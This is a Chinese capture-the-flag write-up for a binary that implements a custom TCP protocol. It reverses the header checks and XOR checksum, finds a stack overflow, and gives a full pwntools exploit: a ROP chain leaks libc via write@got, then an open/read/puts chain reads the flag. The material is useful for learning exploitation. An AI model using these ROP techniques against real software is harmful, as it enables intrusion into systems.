一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和
拿到题目:
在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现
于是先把TCP的头部结构拿过来:
首先进add函数里看看:
可以看到能够申请最多4个chunk,每个chunk最多0x1000
生成之后要通过check_head函数和check_sum的检测
首先看check_head:
从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,如seq_num和ack_num这种,只限制了不能为0,还有lensyn*4似乎等于0x14和0x18都可以,我们先放在这里,接着往下看:
check_sum函数中,做的事情就是将tcp内容拼接到fakeipheadfa后面,然后每两字节转成一个short,进行异或
到这里我们仍然不能完全确定头部结构,再去submit函数中看看:
首先关注v6这个变量,一开始是1,每次加0x1000,必须和头部中的seq_num,所以这个属性的值确定下来了,应该是1,0x1001,0x2001,0x3001
然后根据if中的判断可以得知,4*lensyn不能等于0x14,所以lensyn应为0x18/4,
到这里确定下来的头部应该为:
p16(30318)+p16(10423)+p32(seq_num)+p32(1)+p16(6)+p16(1)+p16(checksum)+p16(0)+p16(1)+p16(0xffff)
校验和需要整个tcp包内容都确定下俩之后才能计算
seq_num则是固定的1或者0x1000*n+1
分析完tcp包结构,我们找找溢出点:
可以看到s距离rbp只有0x3020,而我们赋值4次0x1000大小的东西到栈上,所以第四次会造成一个大面积的栈溢出
之后就正常rop执行一个orw即可:
from re import L
from pwn import *
from ctypes import *
import base64
from Crypto.Util.number import *
#context.log_level = 'debug'
io = process('./pwn')
#io = remote('52.59.124.14',10200)
libc = ELF('./libc-2.31.so')
elf=ELF("./pwn")
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
def getcheck(buf):
sum=0
s="fakeipheadfa"
for i in range(len(s)/2):
sum^=int(s[:2][::-1].encode("hex"),16)
s=s[2:]
while len(buf)!=0:
sum^=bytes_to_long(buf[:2][::-1])
buf=buf[2:]
return sum
def pk(seq_num,buf,pad):
tcp=p16(30318)+p16(10423)+p32(seq_num)+p32(1)+p16(6)+p16(1)+p16(0)*2+p16(1)+p16(0xffff)+buf
tcp=tcp.ljust(0x1000,pad)
checksum=getcheck(tcp)
tcp=tcp[:16]+p16(checksum)+tcp[18:]
return tcp
def menu(choice):
sla("4. Quit.\n",str(choice))
def read_tcp(payload):
menu(1)
sleep(0.1)
io.send(payload)
def delete(i):
menu(2)
sleep(0.1)
io.sendlineafter("Which?",str(i))
def submit():
menu(3)
rdi_ret=0x0000000000401bb3
rsi_ret = 0x0000000000401bb1
main=0x401a5e
write_plt=elf.plt['write']
write_got=elf.got['write']
read_tcp(pk(1,'a'*8,'b'))
read_tcp(pk(0x1001,'a'*8,'b'))
read_tcp(pk(0x2001,'a'*8,'b'))
payload='a'*0x70
payload+=p64(rdi_ret)+p64(1)+p64(rsi_ret)+p64(write_got)+p64(0)+p64(write_plt)+p64(main)
read_tcp(pk(0x3001,payload,'\x00'))
submit()
ru('Done.\n')
libcbase=u64(io.recv(6).ljust(8,'\x00'))-libc.sym['write']
lg("libcbase")
rdx = 0x0000000000119241
bss = 0x404240
delete(0)
delete(1)
delete(2)
delete(3)
read_tcp(pk(1, "aaaa",'a'))
read_tcp(pk(0x1001, "aaaa",'a'))
read_tcp(pk(0x2001, "aaaa",'a'))
payload = ('a'*96+'a'*(0x10-6))
payload +=p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(0)+p64(rdx+libcbase)+p64(0x6)+p64(0)+p64(libcbase+libc.sym['read'])
payload += p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(0)+p64(libcbase+libc.sym['open'])
payload +=p64(rdi_ret)+p64(3)+p64(rsi_ret)+p64(bss)+p64(0)+p64(rdx+libcbase)+p64(0x30)+p64(0)+p64(libcbase+libc.sym['read'])
payload += p64(rdi_ret)+p64(bss)+p64(libcbase+libc.sym['puts'])
read_tcp(pk(0x3001, payload,'\x00'))
gdb.attach(io,'b*0x401a5c')
submit()
sleep(1)
io.recv()
io.sendline("flag\x00")
irt()